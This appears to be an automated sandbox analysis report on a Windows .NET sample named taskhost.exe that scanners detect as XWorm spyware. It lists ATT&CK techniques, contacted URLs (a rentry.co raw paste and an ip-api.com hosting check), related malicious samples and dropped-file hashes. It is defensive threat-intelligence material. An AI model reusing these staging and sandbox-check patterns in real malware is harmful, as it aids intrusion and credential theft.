              Source: Yara matchFile source: 0.0.taskhost.exe.b00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: taskhost.exe PID: 6504, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		11
              Disable or Modify Tools              		OS Credential Dumping321
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		51
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager51
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Obfuscated Files or Information              		LSA Secrets1
              System Network Configuration Discovery              		SSHKeylogging4
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync23
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              taskhost.exe79%ReversingLabsWin32.Exploit.XWorm
              taskhost.exe100%AviraTR/Spy.Gen
              taskhost.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.microsoft.V0%Avira URL Cloudsafe
              http://crl.mP0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              rentry.co
              		104.26.2.16
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://rentry.co/ue6sxoup/rawfalse
                    		high
                    http://ip-api.com/line/?fields=hostingfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.microsoft.Vpowershell.exe, 00000008.00000002.1461200995.000001C5AE48C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1441756050.000001C5A5B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://rentry.co/ue6sxoup/rawPtaskhost.exe, 00000000.00000002.2545878344.0000000002D41000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.mPpowershell.exe, 0000000C.00000002.1598269735.0000020476C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1422033285.000001C595D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://rentry.co/taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://rentry.co/static/icons/512.pngtaskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1422033285.000001C595D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1441756050.000001C5A5B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://rentry.cotaskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000003006000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.copowershell.exe, 0000000C.00000002.1596432437.0000020476A70000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ip-api.comtaskhost.exe, 00000000.00000002.2545878344.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aka.ms/pscore68powershell.exe, 00000008.00000002.1422033285.000001C595B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://rentry.co/static/icons/270.pngtaskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametaskhost.exe, 00000000.00000002.2545878344.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1422033285.000001C595B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://rentry.cotaskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.95.112.1
                                                              		ip-api.comUnited States
                                                              		53334TUT-ASUSfalse
                                                              104.26.2.16
                                                              		rentry.coUnited States
                                                              		13335CLOUDFLARENETUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1574512
                                                              Start date and time:2024-12-13 11:47:28 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 47s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:17
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:taskhost.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@7/9@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 98%
                                                              • Number of executed functions: 23
                                                              • Number of non-executed functions: 2
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 7456 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • VT rate limit hit for: taskhost.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              05:48:36API Interceptor46x Sleep call for process: powershell.exe modified
                                                              07:26:51API Interceptor648488x Sleep call for process: taskhost.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              208.95.112.1jrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                              • ip-api.com/json/
                                                              hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                              • ip-api.com/json/
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • ip-api.com/json
                                                              K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                              • ip-api.com/line/?fields=hosting
                                                              phost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              sppawx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              ahost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              wsapx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • ip-api.com/json/?fields=225545
                                                              ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • ip-api.com/json/?fields=225545

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ip-api.comjrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                              • 208.95.112.1
                                                              hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                              • 208.95.112.1
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.1
                                                              K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              phost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              sppawx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              ahost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              wsapx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 208.95.112.1
                                                              ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 208.95.112.1
                                                              rentry.cofile.ps1Get hashmaliciousLummaC StealerBrowse
                                                              • 104.26.3.16
                                                              bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                                              • 104.26.2.16
                                                              IaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                                                              • 172.67.75.40
                                                              IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                              • 172.67.75.40
                                                              owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              • 172.67.75.40
                                                              gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                              • 172.67.75.40
                                                              xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                              • 172.67.75.40
                                                              Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                              • 172.67.75.40
                                                              MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                              • 172.67.75.40
                                                              http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                              • 104.26.2.16

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUShttps://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188eGet hashmaliciousUnknownBrowse
                                                              • 104.17.25.14
                                                              smb.ps1Get hashmaliciousXmrigBrowse
                                                              • 104.16.231.132
                                                              file.exeGet hashmaliciousLummaCBrowse
                                                              • 172.67.164.37
                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                              • 104.21.35.43
                                                              https://tanvu4275q8.wixsite.com/so/8cPEz8Djt/c?w=bJAUesZ8eZ2xWNc0NTHHsU2Nmh3l2WncU6sGxbkep9U.eyJ1IjoiaHR0cHM6Ly9mc2RqZmllZmlqcy5zaXRlLyIsInIiOiI0ODEzNDVjNy1iNDE0LTQwZDAtYjVlOS02NTQxMmJkNjgzMjAiLCJtIjoibWFpbCIsImMiOiJjYmUwODBjMy03ZjVkLTQxMDctOWFhMC05NGMxMmQzNGZhMGEifQGet hashmaliciousUnknownBrowse
                                                              • 104.21.96.76
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • 172.64.41.3
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • 172.64.41.3
                                                              secure.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              archive.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.17.25.14
                                                              chos.exeGet hashmaliciousUnknownBrowse
                                                              • 162.159.138.232
                                                              TUT-ASUSjrockekcurje.exeGet hashmaliciousBlackshadesBrowse
                                                              • 208.95.112.1
                                                              hbfgjhhesfd.exeGet hashmaliciousBlackshadesBrowse
                                                              • 208.95.112.1
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • 208.95.112.1
                                                              K98766700.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 208.95.112.1
                                                              phost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              sppawx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              ahost.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              wsapx.exeGet hashmaliciousBlank GrabberBrowse
                                                              • 208.95.112.1
                                                              WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 208.95.112.1
                                                              ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                              • 208.95.112.1

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              3b5074b1b5d032e5620f69f9f700ff0eLoader.exeGet hashmaliciousQuasarBrowse
                                                              • 104.26.2.16
                                                              smb.ps1Get hashmaliciousXmrigBrowse
                                                              • 104.26.2.16
                                                              j87MOFviv4.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              DvGZE4FU02.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              j3z5kxxt52.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              zpbiw0htk6.lnkGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exeGet hashmaliciousUnknownBrowse
                                                              • 104.26.2.16
                                                              archive.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 104.26.2.16

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:@...e...........................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h4qzczk.ehe.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ssandi3.fnr.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdbcksok.hvs.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qncwajxb.2ny.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3uyyjfj.mch.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucnag1jr.kpi.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgje4wqj.oc3.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcddv54a.qmm.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):5.903833440110244
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:taskhost.exe
                                                              File size:63'488 bytes
                                                              MD5:3296704171fe01c0fc4fcdd02f2695ca
                                                              SHA1:e0bd82f06d94c0e32d7f6bb9f80f57f8e73a84be
